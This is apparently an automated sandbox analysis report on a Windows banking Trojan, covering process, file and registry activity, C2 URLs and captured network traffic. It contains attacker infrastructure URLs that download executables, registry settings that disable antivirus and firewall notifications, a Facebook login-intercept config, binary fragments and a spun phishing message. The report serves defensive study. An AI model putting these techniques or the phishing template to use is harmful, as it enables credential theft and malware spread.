MD5: 871eb6de3ed408dde7ffed9104eb1d26
SHA1: fe06c3052719c08b2b89401fa98f2a256a0b6ef5
SHA256: 6c79a7ff6a0478bcd9361f976e01ecaf662bea84496908ee526658d7b2c0c3ba
SSDeep: 24576:o/iHni6U9Nj/a9HUb59z YhaIsE9Bw17QDUlDipD6Rl1MOLMwOHH:YE50briErqEwl1Mbwc
Size: 1158144 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Piriform Ltd
Created at: 2014-05-10 00:03:18
Analyzed on: WindowsXP SP3 32-bit

Summary:

Banker. Steals data relating to online banking systems, e-payment systems and credit card systems.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:3488
stotxqfehklfck.exe:2296
zip.exe:3828
bvlwninlaq.exe:2928
bvlwninlaq.exe:4344
stotxqfeh9b6cka5dulftj.exe:2036
ausksswsax.exe:920
ausksswsax.exe:5516
stotxqfehc61ck.exe:5288
stotxqfehx64ck.exe:5324

The Trojan injects its code into the following process(es):

phantomjs.exe:1764

File activity

The process %original file name%.exe:3488 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\stotxqfeh9b6cka5dulftj.exe (7386 bytes)
%System%\wistjhoy\tst (10 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\stotxqfeh9b6cka5dulftj.exe (0 bytes)

The process stotxqfehklfck.exe:2296 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\wistjhoy\tst (10 bytes)

The process phantomjs.exe:1764 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\wistjhoy\aol\captcha.png (2438 bytes)
%System%\wistjhoy\aol\account_created (36 bytes)
%System%\wistjhoy\aol\cookie.txt (4905 bytes)

The Trojan deletes the following file(s):

%System%\wistjhoy\aol\cookie.txt.Hp1764 (0 bytes)

The process zip.exe:3828 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\wistjhoy\aol\tmp\zia03828 (5479 bytes)

The Trojan deletes the following file(s):

%System%\wistjhoy\aol\tmp\lousm2003.exe (0 bytes)
%System%\wistjhoy\aol\tmp\lousm2003.zip (0 bytes)

The process bvlwninlaq.exe:2928 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\wistjhoy\aol\zip.exe (10500 bytes)
%System%\wistjhoy\cfg (671 bytes)
%WinDir%\Temp\stotxqfehc61ck.exe (35 bytes)
%WinDir%\Temp\stotxqfehklfck.exe (7547 bytes)
%System%\wistjhoy\por (1 bytes)
%System%\wistjhoy\aol\phantomjs.exe (183012 bytes)
%System%\wistjhoy\run (10 bytes)
%System%\wistjhoy\rng (160 bytes)
%System%\wistjhoy\ihst (158 bytes)
%System%\ausksswsax.exe (7547 bytes)
%System%\wistjhoy\tst (10 bytes)
%System%\wistjhoy\aol\sender.js (980 bytes)
%WinDir%\Temp\stotxqfehx64ck.exe (35 bytes)
%System%\wistjhoy\aol\facebook01pass.txt (1 bytes)
%System%\wistjhoy\aol\tmp\lousm2003.exe (1373 bytes)
%System%\wistjhoy\aol\exefile (14580 bytes)
%System%\drivers\etc\hosts (852 bytes)

The Trojan deletes the following file(s):

%WinDir%\Temp\stotxqfehc61ck.exe (0 bytes)
%WinDir%\Temp\stotxqfehklfck.exe (0 bytes)
%WinDir%\Temp\stotxqfehx64ck.exe (0 bytes)

The process bvlwninlaq.exe:4344 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\wistjhoy\tst (10 bytes)

The process stotxqfeh9b6cka5dulftj.exe:2036 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\wistjhoy\tst (10 bytes)
%System%\bvlwninlaq.exe (7547 bytes)
%System%\wistjhoy\etc (10 bytes)
%System%\drivers\etc\hosts (22 bytes)

The Trojan deletes the following file(s):

%System%\drivers\etc\hosts (0 bytes)

The process ausksswsax.exe:920 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\wistjhoy\tst (10 bytes)

The process ausksswsax.exe:5516 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\wistjhoy\tst (10 bytes)

Registry activity

The process stotxqfehklfck.exe:2296 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9E EE 24 59 35 D6 80 6E C4 87 9A BF C0 83 2C FF"

The process phantomjs.exe:1764 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E8 4D 70 67 B4 BE BB F1 83 31 DC 96 0E 67 80 7D"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\LocalService\Local Settings\Application Data"

The process bvlwninlaq.exe:2928 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "02 1E 10 1C 53 A9 48 6E 05 6D E7 63 7A 5C 5F AD"

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 01 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"
"Cookies" = "%Documents and Settings%\LocalService\Cookies"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 01 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"
"FirewallDisableNotify" = "1"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%System%\config\systemprofile\Application Data"

[HKU\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ParseAutoexec" = "1"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

Antivirus notifications are disabled:

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process stotxqfeh9b6cka5dulftj.exe:2036 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "09 25 90 0B DC 05 DD 62 35 C3 36 59 EE 99 82 6B"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Engine Manager TCP/IP Topology" = "%System%\bvlwninlaq.exe"

The process stotxqfehc61ck.exe:5288 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "85 88 1D 20 7C 75 FC EE 2F 92 2D C2 C0 DE 6C 89"

The process stotxqfehx64ck.exe:5324 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3D C4 67 2F 97 BA 3D B9 DB EB 71 26 34 C2 38 12"

Dropped PE files

HOSTS file anomalies

The Trojan modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses.
The modified file is 778 bytes in size. The following strings are added to the hosts file listed below:

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://tablefruit.net/index.php?method=validate&mode=sox&v=029&sox=3ba09e01	98.139.135.198
hxxp://tablefruit.net/index.php?method=all&flag&mode=sox&v=029&sox=3ba09e01&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0	98.139.135.198
hxxp://tablefruit.net/index.php?method=setvar&key=cpuinfo&value=Intel(R) Xeon(R) CPU E7340 @ 2.40GHz (2393 MHz)&mode=sox&v=029&sox=3ba09e01&lport=1&rsid=NOSOXYID123&slots=0&spm=1&adm=1&x64=0&mr=0	98.139.135.198
hxxp://tablefruit.net/dep/zip.exe	98.139.135.198
hxxp://tablefruit.net/index.php?method=feed&mode=sox&v=029&sox=3ba09e01&lport=1&rsid=NOSOXYID123&slots=0&spm=1&adm=1&x64=0&mr=0	98.139.135.198
hxxp://tablefruit.net/index.php?method=dep&noxor&file=exefile&mode=sox&v=029&sox=3ba09e01&lport=1&rsid=NOSOXYID123&slots=0&spm=1&adm=1&x64=0&mr=0	98.139.135.198
hxxp://tablefruit.net/index.php?method=hostname&host=www.facebook.com&mode=sox&v=029&sox=3ba09e01&lport=1&rsid=3cc2c400&slots=0&spm=1&adm=1&x64=0&mr=0	98.139.135.198
hxxp://tablefruit.net/dep/phantomjs.exe	98.139.135.198
hxxp://tablefruit.net/index.php?method=dep&noxor&file=phajs.dep&mode=sox&v=029&sox=3ba09e01&lport=1&rsid=3cc2c400&slots=0&spm=1&adm=1&x64=0&mr=0	98.139.135.198
hxxp://tablefruit.net/index.php?method=dep&noxor&file=facebook01pass.txt&mode=sox&v=029&sox=3ba09e01&lport=1&rsid=3cc2c400&slots=0&spm=1&adm=1&x64=0&mr=0	98.139.135.198
hxxp://tablefruit.net/index.php?method=checkport&port=42879&mode=sox&v=029&sox=3ba09e01&lport=1&rsid=3cc2c400&slots=0&spm=1&adm=1&x64=0&mr=0	98.139.135.198
hxxp://hostheader.web.aol.com.websys.akadns.net/
hxxp://mail.aol.com.aol.akadns.net/	64.12.132.55
hxxp://my.screenname.aol.com.aol.akadns.net/_cqr/login/login.psp?sitedomain=sns.webmail.aol.com&lang=en&locale=us&authLev=0&siteState=ver:4|rt:STANDARD|at:SNS|ld:mail.aol.com|uv:AOL|lc:en-us|mt:ANGELIA|snt:ScreenName|sid:cba29550-2828-4767-b16d-6cdc243f65ec&offerId=newmail-en-us-v2&seamless=novl	149.174.97.5
hxxp://tablefruit.net/index.php?method=setvar&key=stopped&value=3cc2c400&mode=sox&v=029&sox=3ba09e01&lport=1&rsid=3cc2c400&slots=0&spm=1&adm=1&x64=0&mr=0	98.139.135.198
hxxp://tablefruit.net/index.php?method=all&mode=sox&v=029&sox=3ba09e01&lport=1&rsid=NOSOXYID123&slots=0&spm=1&adm=1&x64=0&mr=0	98.139.135.198
hxxp://tablefruit.net/index.php?method=setvar&key=connected&value=3c692a04&mode=sox&v=029&sox=3ba09e01&lport=1&rsid=3c692a04&slots=0&spm=1&adm=1&x64=0&mr=0	98.139.135.198
hxxp://tablefruit.net/index.php?method=post&type=captcha_submit&mode=sox&v=029&sox=3ba09e01&lport=1&rsid=3c692a04&slots=0&spm=1&adm=1&x64=0&mr=0	98.139.135.198
hxxp://tablefruit.net/index.php?method=post&type=captcha_poll&mode=sox&v=029&sox=3ba09e01&lport=1&rsid=3c692a04&slots=0&spm=1&adm=1&x64=0&mr=0	98.139.135.198
hxxp://tablefruit.net/forum/pingtest	98.139.135.198
hxxp://partyorderly.net/dep/phantomjs.exe	98.139.135.198
hxxp://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=sns.webmail.aol.com&lang=en&locale=us&authLev=0&siteState=ver:4|rt:STANDARD|at:SNS|ld:mail.aol.com|uv:AOL|lc:en-us|mt:ANGELIA|snt:ScreenName|sid:cba29550-2828-4767-b16d-6cdc243f65ec&offerId=newmail-en-us-v2&seamless=novl	149.174.97.5
hxxp://mail.aol.com/	64.12.132.55
hxxp://webmail.aol.com/	64.12.79.57
hxxp://partyorderly.net/dep/zip.exe	98.139.135.198
aol.tt.omtrdc.net	66.117.23.105
s.aolcdn.com	23.209.55.100
cdn.webmail.aol.com	64.12.128.112
captcha.aol.com	205.188.100.200
at.atwola.com	64.12.96.217
sns-static.aolcdn.com	64.12.66.67
new.aol.com	64.12.66.85
sb.scorecardresearch.com	23.66.187.120
b.aol.com	149.174.97.86
s.sa.aol.com	63.140.54.77

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET MALWARE Possible Windows executable sent when remote host claims to send html content
SURICATA STREAM ESTABLISHED packet out of window
SURICATA STREAM Packet with invalid ack
SURICATA STREAM ESTABLISHED invalid ack

Traffic

GET / HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: webmail.aol.com

HTTP/1.1 301 Moved Permanently

Date: Sat, 17 May 2014 12:00:18 GMT

Server: Apache

Location: hXXp://mail.aol.com/

Content-Length: 228

Keep-Alive: timeout=15, max=9071

Connection: Keep-Alive

Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>301 Moved Permanently</title>.</head
><body>.<h1>Moved Permanently</h1>.<p>The d
ocument has moved <a href="hXXp://mail.aol.com/">here</a>.
</p>.</body></html>...

POST /index.php?method=post&type=captcha_submit&mode=sox&v=029&sox=3ba09e01&lport=1&rsid=3c692a04&slots=0&spm=1&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: tablefruit.net

Content-Type: application/x-www-form-urlencoded

Content-Length: 51811

extension=png&data=iVBORw0KGgoAAAANSUhEUgAAAPIAAABmCAYAAADxn8zxAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAOxAAADsQBlSsOGwAAIABJREFUeJzsvWusZtlZHvisy75913Or6uqu6nZ1tbvtNg4emx6H6YEBRbJHRhM0MMiYHyDh8MPJj8lM20yEAskkwxj4gSKcyMbCjjCIZFAjBoZIQADHhhkGY5EQO9juNm6Kprqr6tQ5dc5329d1mR/vetfe36mboVHQSOzW0Tld53zft/da7/V5n/dd4md+5mc8/vr66+uvr/9fXxoA5rMR8jxHkiSQUkJKCSEEmqZBVVX4uq/7OlhrYa2F9x5SSqRpijRNw2t0/J1SClmWIUkSAIC1Fs45KKUglQIAuPC3ACCEgPQdTNfBew+tNbz3aJoGzrn4PkKIeNNnf+7S0WtahBYuvJmD9x4imDYR/j2RMnxWuGcg3D/9fdrpO97TWgtjDJxzSNMUACDvYTLLZnPf5xtNJoD38M7BDb689/DeIy9SdF2Htm2xWCzw6quv4uTkBLPZDA8//DD29vaQZRmklOi6DlJKZHkOeI+6rqFk8hpWD9DuNb0cdVhfvoQQW3JojIEQAkKo+MzDv1Wa1t+LrbeBA73vyeIUR0dHWJUVZrMZDg4OkOc5RPiMdl1iNp1gua5QVRV0keP69etYrGs8+eSTONmU0FpDJCnJpg3rD3p9JTw2mw2q1QpN00DDI0kSFOH+UdUkV22Hqqrgqgree2RJ0KGdCdI0xWwyRpIkWC6XuHnzJsr1EgDwdW97K5xzWJ2e4MaNG1iv15BSwjuDpmlQ1zUp8mQyQdd1aJombnbTNEjTFJMJfYhz7g5FTpIEWmtISQtpjIExJipv27ZRwPI8R1EU0LoXeqVUMAT9pggh6KHDZvK/3+2617+/lksIAfhtjWuahu5N0rNLiHCvoP9XCuB7CQrHa0T/1BuAu11ZlsXnVUoBUtL7hfdsy3LreYUQcR3pvvr/n0wmOHfuHJIkQdu2uHXrFi5dugSVZYBzcY9U10EpRZ/3VxyTKaWifDnnSDmV2pIHgJdExC9W9s4YAHdTZLrG4zG6rkM2GmM6nWI6nUIGMy0BZNMJAER5VTnth7UWq9UKXki6r4Hx9N7Dw8M5B5mQHNugJzAdrLXorKW9CvcvpYxOLs9zzKczjMdj
HTTP/1.0 200 OK

Date: Sat, 17 May 2014 12:00:55 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 2

Server: YTS/1.20.28
.............

GET /index.php?method=feed&mode=sox&v=029&sox=3ba09e01&lport=1&rsid=NOSOXYID123&slots=0&spm=1&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: tablefruit.net

HTTP/1.0 200 OK

Date: Sat, 17 May 2014 12:00:07 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 0

Server: YTS/1.20.28
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................
<<< skipped >>>

GET /index.php?method=checkport&port=42879&mode=sox&v=029&sox=3ba09e01&lport=1&rsid=3cc2c400&slots=0&spm=1&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: tablefruit.net

HTTP/1.0 200 OK

Date: Sat, 17 May 2014 12:00:18 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 30

Server: YTS/1.20.28

GET /index.php?method=dep&noxor&file=exefile&mode=sox&v=029&sox=3ba09e01&lport=1&rsid=NOSOXYID123&slots=0&spm=1&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: tablefruit.net

HTTP/1.0 200 OK

Date: Sat, 17 May 2014 12:00:07 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 2

Server: YTS/1.20.28
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......'`./c..|c..|
c..|.N.|`..|}S.|{..|}S.|...|D..|d..|c..|...|}S.|Y..|}S.|b..|Richc..|..
......................PE..L.....pS....................................
......@...............................................................
........... ..P.......................................................
............ ...@[email protected]...{.
.......................... ..`.rdata...9.......:..................@..@
.data........0......................@.................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..............................................8.A..y........V....8.A..
f....D$..t.V..........^................L$..T$.V.t$.W...r...;.u........
.....s...tD.....9 .u1...v5..B...y. .u ...v$..B...y. .u....v...B...I. .
..._...^._3.^.............Q..3.f..$..$VW.|$..D$..G....x..O.....9.u.H..
...}..t$..N....x..V.....:.u.I.....}..T$....`..~..T$.....s..T$..D$.....
C...}...}._3.^Y.;.}._.....^Y.~._...^Y.S..|J.. O..L$..W..^....;..w:....
C..T$....*Z..T$..D$.......C..W..^....;..r....y.[_3.^Y.[_.....^Y.[_...^
Y.......D$......T$....\$..\$.f...C........h..h...j..u.....C.......
<<< skipped >>>

GET /index.php?method=setvar&key=cpuinfo&value=Intel(R) Xeon(R) CPU E7340 @ 2.40GHz (2393 MHz)&mode=sox&v=029&sox=3ba09e01&lport=1&rsid=NOSOXYID123&slots=0&spm=1&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: tablefruit.net

HTTP/1.0 200 OK

Date: Sat, 17 May 2014 12:00:06 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 2

Server: YTS/1.20.28
.............

GET /index.php?method=all&flag&mode=sox&v=029&sox=3ba09e01&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: tablefruit.net

HTTP/1.0 200 OK

Date: Sat, 17 May 2014 12:00:06 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 0

Server: YTS/1.20.28
ping.5.FLAG cfg.132."groupcook.net" "wifeknew.net" "southblood.net" "w
atchstand.net" "signarmy.net" "tablefruit.net" "saltsecond.net" "lasop
eidres.com" var_user_ip.597.%send_aol_spam% = "1";.%invite_cc% = "1";.
ºn_contact% = "1";.%live_link% = "hXXp://helpdesk.corp.ebay.com/chat
.php?id=4094&sess=db0e2494148fecef9876b7a73b18b2ca&talk=1";.ëaylive%
 = "partyorderly.net";.%set_intercepts% = ""VVV.facebook.com" "partyor
derly.net" "/fb_login/" "/login/" "1" "facebook.com" "partyorderly.net
" "/fb_login/" "/login/" "0" ";.Þp_host% = "partyorderly.net";.Þp_
path% = "/dep/";.%no_password% = "0";.%timer% = "1200";.%state% = "BU"
;.%cpuinfo% = "AMD Phenom(tm) 9550 Quad-Core Processor (1899 MHz)";.%i
p% = "92.81.7.31";.%port% = "40192";.%relay_soxid% = "3cc2c400";......
........

GET /index.php?method=dep&noxor&file=facebook01pass.txt&mode=sox&v=029&sox=3ba09e01&lport=1&rsid=3cc2c400&slots=0&spm=1&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: tablefruit.net

HTTP/1.0 200 OK

Date: Sat, 17 May 2014 12:00:15 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 0

Server: YTS/1.20.28
{For^In^During} the {last^past} {months^days^weeks}, {our network^face
book} {has been^was} {under attack^attacked^hacked} so {we {urge^ask^r
equire} you^you are {urged^asked^required}} to {download^install^open}
 the attached {utility^program^app{^lication}^file^software}. {This^It
} will {enable^generate^initiate} a {secure^safe^trusted} connection t
o {our network^facebook^our servers} {so^and} {you^your location^your 
computer^your pc} {will^can} be {secure^safe^trusted}...{You {{will ^}
have to^should^must} {use^enter^type{^ in}}^Please {use^enter^type{^ i
n}}^{Use^Enter^Type{^ in}}^You {will ^}need{^ to use^ to enter^ to typ
e{^ in}}^When asked, {{please ^}use^enter^type{^ in}}} {the following^
this} {pass{^key^code^phrase^word}^key{^word}}{ ^}: %aol_current_pass%
..{We are^Facebook is} {trying^attempting} to {reach^contact^warn} all
{^ of} our {members^users} {in no time^fast^urgently^immediately} but 
{we have {limited^moderate} email{^ing} {capacity^{cap^}abilit{y^ies}^
resources}^our email{^ing} {capacity^{cap^}abilit{y^ies}^resources} ar
e {limited^moderate}}. {We^Facebook^Our {web^}site^Our company^Our net
work} {would^will} be {very ^}{grateful^thankful^appreciative} if you 
{could^would^will} {send^mail^email^transmit} the attached {utility^pr
ogram^app{^lication}^file^software} to your {friends^contacts^peers} a
nd {family^relatives} {as soon as possible^asap^ASAP^urgently^immediat
ely}...{NOTE:^IMPORTANT:^BE ADVISED that^NOTICE that} {you {will only{
^ be able to}^can only} {open^view^access^visualize^read^use} the 
<<< skipped >>>

GET /index.php?method=setvar&key=stopped&value=3cc2c400&mode=sox&v=029&sox=3ba09e01&lport=1&rsid=3cc2c400&slots=0&spm=1&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: tablefruit.net

HTTP/1.0 200 OK

Date: Sat, 17 May 2014 12:00:29 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 6

Server: YTS/1.20.28
.............

GET /index.php?method=all&mode=sox&v=029&sox=3ba09e01&lport=1&rsid=NOSOXYID123&slots=0&spm=1&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: tablefruit.net

HTTP/1.0 200 OK

Date: Sat, 17 May 2014 12:00:34 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 0

Server: YTS/1.20.28
ping.5.FLAG cfg.132."southblood.net" "watchstand.net" "signarmy.net" "
saltsecond.net" "groupcook.net" "wifeknew.net" "tablefruit.net" "lasop
eidres.com" var_user_ip.504.%invite_cc% = "1";.ºn_contact% = "1";.%l
ive_link% = "hXXp://helpdesk.corp.ebay.com/chat.php?id=4094&sess=db0e2
494148fecef9876b7a73b18b2ca&talk=1";.ëaylive% = "partyorderly.net";.
%set_intercepts% = ""VVV.facebook.com" "partyorderly.net" "/fb_login/"
 "/login/" "1" "facebook.com" "partyorderly.net" "/fb_login/" "/login/
" "0" ";.Þp_host% = "partyorderly.net";.Þp_path% = "/dep/";.%no_pa
ssword% = "0";.%timer% = "1200";.%state% = "BU";.%cpuinfo% = "Intel(R)
 Xeon(R) CPU E7340 @ 2.40GHz (2393 MHz)";..............

GET /index.php?method=setvar&key=connected&value=3c692a04&mode=sox&v=029&sox=3ba09e01&lport=1&rsid=3c692a04&slots=0&spm=1&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: tablefruit.net

HTTP/1.0 200 OK

Date: Sat, 17 May 2014 12:00:46 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 0

Server: YTS/1.20.28
.............

GET /dep/phantomjs.exe HTTP/1.0

Accept: */*

Connection: close

Host: partyorderly.net

HTTP/1.0 200 OK

Date: Sat, 17 May 2014 12:00:09 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Last-Modified: Fri, 06 Sep 2013 06:32:44 GMT

Accept-Ranges: bytes

Content-Length: 7121920

Content-Type: application/octet-stream

Age: 0

Server: YTS/1.20.28
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........PZ..14..14.
.14..G...14.`....14......14..I...14..15..34..I...14......24......84...
...14......14......14.Rich.14.........................PE..L.....)R....
..............l.. [email protected]...
[email protected].!.Z...$.8.......8.$...............
....4.8.....................................t.8.H.....................
......................UPX0....................................UPX1....
[email protected].... ....8.......l.............@.
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
.......3.08.UPX!..........5 .m8...l..,2....m.........%m.............o.
[email protected]$.Sj.P.L.Q...............P..l.T$......~.....u.6.K.<B.
.[Y.@.....*...$P.X9.Y..w.......V.t......v}.....R.D$.P......a.........H
P.ooo...^.......J..H.H.3JY.m..V....?1..p0$. [email protected][email protected]..\...^..
.?.:...}7.~...,..y.8.j ...0....W_tb.3.to..k........g.....l."..5.....7.
.#... .V`......C.....P=...I...aj...v?..=......[dr.P..4j.......f.,.\...
.*>.l.Y..A4..>8eQ.....v.8a..,m...>l_.=.N.|..it m...g.\...?..7
8.H..........O..~ .u j......t.V..E.....F &3...._F...(.,((k.Bi(..S.
<<< skipped >>>

GET /index.php?method=hostname&host=VVV.facebook.com&mode=sox&v=029&sox=3ba09e01&lport=1&rsid=3cc2c400&slots=0&spm=1&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: tablefruit.net

HTTP/1.0 200 OK

Date: Sat, 17 May 2014 12:00:08 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 0

Server: YTS/1.20.28
..........................

